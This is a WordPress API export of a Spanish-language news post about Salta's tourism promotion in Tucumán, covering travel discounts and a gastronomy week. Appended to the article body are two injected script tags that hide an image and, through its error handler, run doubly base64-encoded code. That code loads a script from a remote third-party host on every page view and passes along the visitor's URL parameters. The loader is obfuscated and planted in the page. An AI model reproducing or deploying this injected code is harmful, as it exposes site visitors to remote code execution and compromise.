{"id":4090,"date":"2024-06-10T12:02:09","date_gmt":"2024-06-10T15:02:09","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4090"},"modified":"2025-08-13T23:54:45","modified_gmt":"2025-08-14T02:54:45","slug":"salta-invito-a-tucumanos-a-vivir-el-fin-de-semana-extra-largo-en-la-mas-linda","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4090","title":{"rendered":"Salta invit\u00f3 a tucumanos a vivir el fin de semana extra largo en la m\u00e1s linda"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-c090aca86aa370cc75a58bda4122a04d\" style=\"background-color:#a1075e\"><em>En la vecina provincia, Salta promocion\u00f3 sus atractivos tur\u00edsticos, dio a conocer los descuentos y actividades que se realizar\u00e1n por la Semana Gastron\u00f3mica y los invit\u00f3 a aprovechar desde todo el pa\u00eds el Outlet de Viajes \u201cVoy a Salta\u201d.<\/em><\/h3>\n\n\n\n<p>Con sorpresas, cultura, y gastronom\u00eda local, Salta present\u00f3 en Tucum\u00e1n, durante un evento destinado a medios de prensa, referentes tur\u00edsticos p\u00fablicos y privados, su oferta tur\u00edstica para disfrutar de naturaleza, aventura durante el fin de semana extra largo.<\/p>\n\n\n\n<p>En la presentaci\u00f3n, que se llev\u00f3 adelante en el sal\u00f3n Eladio Pache del Ente Tucum\u00e1n Turismo, la secretaria de Turismo de Salta,&nbsp;<strong>Nadia Loza<\/strong>&nbsp;invit\u00f3 \u201ca todos los tucumanos a disfrutar de Salta, un destino bendecido por su naturaleza con paisajes que van desde el verde exuberante hasta la aridez del desierto donde se encontrar\u00e1n tambi\u00e9n con el Tren a las Nubes, la Ruta del Vino, una excelente gastronom\u00eda y de imperdibles ofertas de la mano del sector privado\u201d.<br>&nbsp;<br>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12472-salta-invito-a-tucumanos-a-vivir-el-fin-de-semana-extra-largo-en-la-mas-linda.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12472-salta-invito-a-tucumanos-a-vivir-el-fin-de-semana-extra-largo-en-la-mas-linda.jpg\" alt=\"Salta invit\u00f3 a tucumanos a vivir el fin de semana extra largo en la m\u00e1s linda\"\/><\/a><\/figure>\n\n\n\n<p>\u201cAdem\u00e1s en este mes que se conmemora el fallecimiento de nuestro h\u00e9roe Mart\u00edn Miguel de G\u00fcemes, podr\u00e1n conocer un poquito de su historia y de su legado a trav\u00e9s de las m\u00e1s de 170 actividades organizadas por los distintos municipios de la Provincia\u201d, destac\u00f3 Loza.<br>&nbsp;<br>Por su parte el presidente del Ente Tucum\u00e1n Turismo,&nbsp;<strong>Domingo Amaya<\/strong>&nbsp;dijo \u201cestamos muy contentos de recibirlos en nuestra Provincia y conocer su oferta tur\u00edstica, esto habla del trabajo conjunto que llevamos adelante como regi\u00f3n para que cada uno de sus habitantes puedan conocer las 6 provincias que la conforman con sus lugares maravillosos y sus incontables atractivos que nos conviertes en una regi\u00f3n con un gran potencial tur\u00edstico\u201d.<br>&nbsp;<br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12473-salta-invito-a-tucumanos-a-vivir-el-fin-de-semana-extra-largo-en-la-mas-linda.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12473-salta-invito-a-tucumanos-a-vivir-el-fin-de-semana-extra-largo-en-la-mas-linda.jpg\" alt=\"Salta invit\u00f3 a tucumanos a vivir el fin de semana extra largo en la m\u00e1s linda\" style=\"width:333px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>En el marco del evento, el presidente de la C\u00e1mara de Turismo de Salta,&nbsp;<strong>Juan Lucero<\/strong>&nbsp;promocion\u00f3 el Outlet de Viajes \u201cVoy a Salta\u201d para comprar en forma online servicios tur\u00edsticos con importantes beneficios desde todo el pa\u00eds. &nbsp;\u201dTenemos descuentos variados y muy atractivos para los visitantes con 2&#215;1 y rebajas de hasta el 50% en distintos prestadores tur\u00edsticos de las 7 regiones de la Provincia para el mes de junio, una \u00e9poca perfecta para disfrutar de Salta\u201d, explic\u00f3.<br>&nbsp;<br>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12474-salta-invito-a-tucumanos-a-vivir-el-fin-de-semana-extra-largo-en-la-mas-linda.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12474-salta-invito-a-tucumanos-a-vivir-el-fin-de-semana-extra-largo-en-la-mas-linda.jpg\" alt=\"Salta invit\u00f3 a tucumanos a vivir el fin de semana extra largo en la m\u00e1s linda\"\/><\/a><\/figure>\n\n\n\n<p>Asimismo present\u00f3 la Semana Gastron\u00f3mica Salta detallando que \u201cdel 15 al 22 de junio se realizar\u00e1n diferentes actividades y promociones con ofertas especiales en todos los restaurantes adheridos de distintos puntos de la provincia\u201d.<br>&nbsp;<br>Cabe destacar que los locales gastron\u00f3micos de Salta todav\u00eda se pueden inscribir para ofrecer descuentos y promociones; como as\u00ed tambi\u00e9n para participar de la ronda clasificatoria del Torneo Federal de Chef, que se llevar\u00e1 adelante el pr\u00f3ximo 12 de junio en el Centro de Convenciones Salta.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-invito-a-tucumanos-a-vivir-el-fin-de-semana-extra-largo-en-la-mas-linda-96077\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En la vecina provincia, Salta promocion\u00f3 sus atractivos tur\u00edsticos, dio a conocer los descuentos y actividades que se realizar\u00e1n por la Semana Gastron\u00f3mica y los invit\u00f3 a aprovechar desde todo el pa\u00eds el Outlet de Viajes \u201cVoy a Salta\u201d. Con sorpresas, cultura, y gastronom\u00eda local, Salta present\u00f3 en Tucum\u00e1n, durante un evento destinado a medios [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4091,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18],"tags":[],"class_list":{"0":"post-4090","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4090"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4090"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4090\/revisions"}],"predecessor-version":[{"id":6769,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4090\/revisions\/6769"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4091"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4090"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4090"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4090"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}